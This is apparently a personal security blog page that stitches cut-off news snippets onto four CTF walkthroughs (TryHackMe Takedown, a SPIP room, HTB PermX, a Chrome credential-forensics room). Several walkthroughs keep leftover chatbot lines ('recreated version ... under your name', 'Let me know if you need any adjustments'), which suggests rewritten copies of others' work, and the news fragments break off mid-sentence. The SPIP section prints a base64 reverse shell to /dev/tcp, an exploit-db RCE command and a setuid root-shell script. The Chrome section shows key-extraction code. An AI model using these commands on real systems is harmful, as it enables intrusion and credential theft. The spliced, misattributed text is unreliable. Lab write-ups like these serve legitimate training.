Author: VanshTheHacker

After more than 25 years of mitigating risks, ensuring compliance, and building robust security programs for Fortune 500 companies, I’ve learned that looking busy isn’t the same as being secure. 
It’s an easy trap for busy cybersecurity leaders to fall into. We rely on metrics that tell a story of the tremendous efforts we’re expending – how many vulnerabilities we patched, how fast we

A malicious campaign dubbed PoisonSeed is leveraging compromised credentials associated with customer relationship management (CRM) tools and bulk email providers to send spam messages containing cryptocurrency seed phrases in an attempt to drain victims’ digital wallets.
“Recipients of the bulk spam are targeted with a cryptocurrency seed phrase poisoning attack,” Silent Push said in an

A likely lone wolf actor behind the EncryptHub persona was acknowledged by Microsoft for discovering and reporting two security flaws in Windows last month, painting a picture of a “conflicted” individual straddling a legitimate career in cybersecurity and pursuing cybercrime.
In a new extensive analysis published by Outpost24 KrakenLabs, the Swedish security company unmasked the up-and-coming

The North Korean threat actors behind the ongoing Contagious Interview campaign are spreading their tentacles on the npm ecosystem by publishing more malicious packages that deliver the BeaverTail malware, as well as a new remote access trojan (RAT) loader.
“These latest samples employ hexadecimal string encoding to evade automated detection systems and manual code audits, signaling a variation

Here’s the recreated version of the “Takedown” CTF walkthrough under your name, Vansh Shrivastava:

Takedown CTF Walkthrough by Vansh Shrivastava

Today, we’ll be tackling a machine from TryHackMe called “Takedown,” which is classified as an Insane difficulty machine.

Challenge link: TryHackMe – Takedown

Before diving in, we’ll check out the provided PDF: OPORDOVERCOOKEDRISOTTO.pdf.

1. Enumeration

After reviewing the PDF and understanding the objectives, we kick things off with a basic Nmap scan.

The scan reveals that only ports 22 and 80 are open. We’ll start by investigating port 80.

I visited the web server, but nothing stood out initially. So, I launched a web directory brute-forcing tool, feroxbuster. It’s fast, customizable, and user-friendly.

From the scan, we found two interesting items: robots.txt and /inc.

First, let’s check out robots.txt. It disallows bots from accessing favicon.ico. Upon investigating this file, we discovered that it’s not an icon file but a Portable Executable (PE) file.

Interestingly, the hash of the favicon matches the one from the PDF. According to the document, the previous attacker gained access through this file.

Next, we move to the /api directory, which contains a subdirectory called agents. We could have also found this by reviewing the source code of the favicon.ico. The source code shows six potential commands we can run.

2. Exploitation

I launched Burp Suite to dig deeper into the /api directory. At first, we got a 404 error. But after changing the user-agent, we received a 200 OK response, along with a UID and hostname.

Next, I specified the agent UID in the URL, changed the content type to application/json, and used the file parameter we extracted from the favicon.ico to read the content of /etc/passwd. Success!

With that confirmation, I tested the upload command and then used the exec command to gain an initial foothold on the target.

To stabilize the shell, I encoded the payload in base64 to bypass security and used pwncat-cs to streamline the shell experience. And just like that, we got our shell!

3. Privilege Escalation

During my situational awareness phase, nothing interesting stood out—no SUID, GUID, or group memberships. The usual files like /etc/passwd, /etc/shadow, and /etc/sudoers were all secured.

However, using pspy, I noticed an anonymous cron job running every minute. Time to dig deeper.

I uploaded pspy to the target, made it executable, and inspected the output. A strange file, /usr/share/diamorphine_secret/svcgh0st, was running in the background. A quick Google search revealed that it’s part of a popular rootkit called Diamorphine.

https://github.com/m0nad/Diamorphine/tree/master

According to the creator of this rootkit, sending a signal 64 to any process ID elevates the user to root. Let’s try it!

4. Post Exploitation

Finally, with root access, it’s time to capture the flags!

User Flag: Captured

Root Flag: Captured

Conclusion:
Although TryHackMe lists this as an Insane difficulty machine, I’d rank it somewhere between Medium and Hard. It was an exciting challenge that gave me plenty of enjoyment. Thanks for reading this walkthrough, and I hope you enjoyed it as much as I did!

Let me know if you need any adjustments!

This is one of those classic SPIP CTF rooms on TryHackMe that includes enumeration, version detection, directory fuzzing, remote code execution, and privilege escalation. Let’s dive in!

Reconnaissance:

As always, we start by running an Nmap scan to check for open ports and services running on the target machine.

sudo nmap -sC -A -Pn <ip>

Directory Fuzzing:

We find Apache running on port 80 and SSH on port 22. The web page itself doesn’t give much away, but there’s a hint that SPIP might be running. Time to fuzz the directories.

gobuster dir -u <ip> -w <wordlist>

Parameters:

• dir: Directory fuzzing mode
• -u: URL to scan
• -w: Wordlist
• -t 25: Faster scanning using 25 threads
• -q: Quiet mode to display only results

Gobuster reveals the “spip” directory, and by examining the page source, we determine that SPIP 4.2.0 is running. Knowing the version is key to exploitation.

Exploitation:

Now that we have the SPIP version, it’s time to look for an exploit. I prefer using Searchsploit for this.

searchsploit spip 4.2.0

We find a Remote Code Execution (RCE) exploit. Before we get excited, we need to craft a reverse shell payload, set up a listener with Netcat, and then run the exploit.

cp /usr/share/exploitdb/exploits/php/webapps/51536.py .
echo -n "bash -i >& /dev/tcp/lhost_ip/lport 0>&1" | base64 -w0
python3 51536.py -u 'http://rhost_ip/spip/' -c "echo <payload> | base64 -d | bash"

(Replace lhost_ip with your IP and lport with your port.)

With the payload delivered, we gain a foothold and grab the user.txt flag.

Privilege Escalation:

Next, we navigate to the .ssh directory, where we find id_rsa keys for the user “think.” Let’s grab the keys (old-school copy-paste) and log in with SSH for a more stable connection.

After copying the keys to our Kali VM, we have got to change the file permissions so we can use it to log in via SSH.

chmod 600 id_rsa
ssh -i id_rsa think@<ip>

At this point, running sudo -l asks for the “think” user password, which we don’t have. After some poking around, I check /opt but lack permissions to access it. The hint leads me to explore AppArmor, where I notice /bin/bash running as root.

Here’s the trick: we copy /bin/bash to /dev/shm and run it with elevated permissions.

cd /dev/shm
cp /bin/bash .
./bash -p

Inside /opt, we find the editable “run_container_sh” file, which can run as root. We edit it to create a root shell:

#!/bin/bash
cp /bin/bash /tmp/default
chmod +s /tmp/default

Run the script, and now we have root!

By exploiting the SPIP vulnerability and leveraging incorrect file permissions, we’ve achieved root access and completed the room. If you enjoyed this walkthrough, feel free to check out other CTFs on TryHackMe!

Here’s the recreated walkthrough as Vansh Shrivastava:

Before diving in, here’s a quick tip—don’t overcomplicate things. This box is straightforward if you stay focused and apply what you’ve already practiced. It took me an entire day, but it should have only taken a couple of hours.

Nmap Scan
As always, I kicked off with an nmap scan, which revealed two open ports: 22 (SSH) and 80 (HTTP).

Web Page on Port 80
After visiting the web page on port 80, I fuzzed for subdomains and virtual hosts. Before doing that, I made sure to add the IP address and domain name to the /etc/hosts file.

Subdomain Discovery
Fuzzing revealed two subdomains: lms and www. I added them to the /etc/hosts file as well. On visiting lms.permx.htb, I was greeted by a login page for Chamilo.

Default Credentials Fail
I tried using default credentials for Chamilo, but no luck. Next, I fuzzed directories, hoping for some misconfiguration or exposed credentials, but still nothing.

Chamilo Exploit Search
Frustrated after a couple of hours, I searched for Chamilo exploits. I came across CVE-2023-4220, which allows unauthenticated users to upload files. After trying the Proof-of-Concept (PoC), I found some pre-existing exploit files like rce.php and reverse_shell.php.

Reverse Shell
I used one of these files to upload a reverse shell and started a netcat listener. Once the reverse shell was established, I stabilized it using the Python one-liner:
python3 -c 'import pty; pty.spawn("/bin/bash")'.

SSH Access
I searched around for SSH keys or credentials. While looking through the configuration file on additional_webservices.php, I found database credentials. After a wild goose chase trying to crack an admin hash, I realized it wasn’t worth the effort. Instead, I used the credentials to SSH into the user mtz, and it worked!

Privilege Escalation
With mtz access, I transferred and ran Linpeas to find potential privilege escalation paths. Running sudo -l revealed that mtz could execute the /opt/acl.sh script as sudo, but the file wasn’t writable.

Manipulating Permissions
I researched the setfacl command, which allows changing file permissions. By creating a symlink to /etc/passwd, I could manipulate the file, remove the root password, and switch to the root user. The symlink command was the key to getting the root flag.

And that’s how I rooted the PermX HTB!

Here’s the recreated walkthrough as Vansh Shrivastava:

TryHackMe Room: Chrome Challenge
Operating Systems: Windows, Kali
Difficulty: Hard
Category: Forensics

A password manager’s security is only as strong as the password protecting it. In this challenge, a malicious actor extracted something over the network, and our task is to figure out what it was. After downloading and extracting the provided chromefiles.zip, let’s dive in to answer the questions.

Questions to Answer:

1. What is the first password we find?
2. What is the URL in the first index (fully defanged)?
3. What is the password in the first index?
4. What is the URL in the second index (fully defanged)?
5. What is the password in the second index?

Step 1: Analyzing PcapNG with Wireshark

After extracting the zip file, I opened the pcapng file with Wireshark. The TCP handshake and several SMB2 packets were visible. Though SMB2 uses AES encryption, we can still see file requests in plain text. The goal here is to rebuild the files based on these requests.

Step 2: Reverse Engineering with dnSpy

Next, I used dnSpy to analyze the transfer.exe file. The key and IV vector needed for decryption were retrieved from the file, as shown in the screenshot provided. This is critical for decrypting the next step.

Step 3: Decrypting the File with CyberChef

With the key and IV vector, I turned to CyberChef to decrypt the file using AES. After adjusting the parameters, plain text data appeared. CyberChef identified the file as a zip, so I downloaded and extracted it to obtain the AppData file.

Step 4: Getting the Hash with DPAPImk2john

Using the DPAPImk2john script, I was able to extract the user’s hash from the AppData file.

Step 5: Cracking the Password with John the Ripper

Switching over to Kali, I cracked the hash using John the Ripper with the rockyou wordlist. The hash file needed to be recoded to UTF-8 first, but after running the cracker, the first password was found in seconds.

Step 6: Getting the AES Key with Mimikatz

To decrypt the master key, I employed Mimikatz, a well-known tool in both cybersecurity and hacking circles. After decoding the relevant file, I used the following Python script to decrypt the private AES key:

import json
import base64

fh = open('AppData/Local/Google/Chrome/User Data/Local State', 'rb')
encrypted_key = json.load(fh)

encrypted_key = encrypted_key['os_crypt']['encrypted_key']

decrypted_key = base64.b64decode(encrypted_key)

open("dec_data",'wb').write(decrypted_key[5:])

Step 7: Extracting Chrome Credentials

With the decrypted AES key in hand, I modified a script to extract the passwords stored in Chrome. After running it, the passwords and associated URLs were displayed in the console.

Reflections:

This room was a blend of medium and hard difficulty. What made this challenge especially engaging was how it intersected with my current exploration of Google Chrome’s password manager through a BadUSB payload. It required a solid understanding of reverse engineering and cryptography, which made the room both educational and enjoyable.

That’s my walkthrough of the TryHackMe Chrome Challenge, and it provided an excellent opportunity to sharpen key skills while solving a realistic forensic challenge.